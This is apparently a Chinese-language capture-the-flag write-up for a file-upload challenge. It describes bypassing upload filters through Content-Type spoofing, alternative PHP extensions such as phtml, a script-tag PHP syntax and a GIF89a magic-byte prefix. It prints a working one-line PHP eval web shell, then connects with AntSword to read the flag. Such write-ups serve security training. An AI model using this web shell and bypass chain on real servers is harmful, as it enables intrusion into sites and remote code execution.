0x01 題目
0x02 解題程序
嘗試把一句話木馬原封不動上傳,提示需要image,
那行,咱繼續嘗試各種檔案上傳姿勢,首先改Content-Type為image/jpeg,
看來后綴名不能為php,那么再改各種后綴名試試,例如,php3,php4,php5,phtml,phar,我改成phtml,
看來不能含有'<?', 那么我們就需要把php換一種格式了,看下圖:
還是不行,叫我別騙他了窩,那行,那我再騙一波,加上gif的檔案幻數,在PHP代碼前加上GIF89a:
GIF89a <script language="php"> @eval($_POST['hacker']); </script>
搞定,但沒有顯示檔案路徑,猜測在upload目錄下,于是嘗試訪問:
只看到GIF89a,但看不到腳本代碼,一般是成功了,用蟻劍嘗試連接:
連上了以后直接在根目錄下找到flag,完成,
flag{2e58d7d7-b6c2-44a2-9890-aae4edfdbcfc}
最后,歡迎師傅們指正和討論~
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/177313.html
標籤:其他
上一篇:堆疊的壓入、彈出序列
下一篇:Redis.conf配置